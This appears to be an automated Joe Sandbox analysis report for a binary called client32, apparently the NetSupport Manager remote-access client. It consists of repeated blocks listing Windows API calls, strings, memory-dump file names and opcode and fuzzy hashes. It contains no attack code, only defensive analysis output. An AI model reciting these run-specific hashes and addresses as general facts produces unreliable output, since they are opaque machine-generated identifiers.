                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 2229609774-2830328467
                                                                                        • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                        • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                        • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                        • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                        • LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D5F8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoadVersion
                                                                                        • String ID: AudioCapture.dll
                                                                                        • API String ID: 3209957514-2642820777
                                                                                        • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                        • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                        • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                        • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                        APIs
                                                                                        • ReleaseDC.USER32(?,?), ref: 11001BBB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001BA1
                                                                                        • m_hWnd, xrefs: 11001BA6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 3704029381-2830328467
                                                                                        • Opcode ID: 1bf9a444050f35cfe956e80297a3da14019c1d03f8e9835ee5d70418a9010044
                                                                                        • Instruction ID: e79f40fb120e4deef42ce200f9e6c9239afd2a6aa69c55604b67f0d5db68f33b
                                                                                        • Opcode Fuzzy Hash: 1bf9a444050f35cfe956e80297a3da14019c1d03f8e9835ee5d70418a9010044
                                                                                        • Instruction Fuzzy Hash: 69D02BB16003287BD300C641DC41ED6F3CCE709264F00403AF91552500E6B0E44083D0
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110155A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle
                                                                                        • String ID: \\.\NSWFPDrv
                                                                                        • API String ID: 3498533004-85019792
                                                                                        • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                        • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                        • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                        • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                        APIs
                                                                                        • FindWindowA.USER32 ref: 1111316A
                                                                                        • SendMessageA.USER32(00000000,00000414,00000000,00000000,?,1111EE7B,00000000,00000000), ref: 11113180
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FindMessageSendWindow
                                                                                        • String ID: MSOfficeWClass
                                                                                        • API String ID: 1741975844-970895155
                                                                                        • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                        • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                        • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                        • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                        APIs
                                                                                        • DestroyWindow.USER32 ref: 1115F338
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                        • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                        • API String ID: 1417657345-2201682149
                                                                                        • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                        • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                        • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                        • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                        APIs
                                                                                        • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                        • m_hWnd, xrefs: 1101D3A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 1590435379-2830328467
                                                                                        • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                        • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                        • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                        • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                                        APIs
                                                                                        • GetMenu.USER32(?,?,?,1115BD0F,?,?), ref: 1115B918
                                                                                        • GetPropA.USER32(?,OldMenu), ref: 1115B928
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MenuProp
                                                                                        • String ID: OldMenu
                                                                                        • API String ID: 601939786-3235417843
                                                                                        • Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                        • Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
                                                                                        • Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                        • Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 11001B84
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001B6E
                                                                                        • m_hWnd, xrefs: 11001B73
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 1426755417-2830328467
                                                                                        • Opcode ID: fc0c8b9fffefdfec58d6b17608931234d5ca75a013e114f81d07d15824db0a83
                                                                                        • Instruction ID: c965eeeb9282c2230bcc2d2e70a04aceb6947dc125d68a22ae0f57a9989a012e
                                                                                        • Opcode Fuzzy Hash: fc0c8b9fffefdfec58d6b17608931234d5ca75a013e114f81d07d15824db0a83
                                                                                        • Instruction Fuzzy Hash: B8D022B1E00235ABD7109656EC46FC5B2C8AB0E398F00407AF06262000E6B0E8808391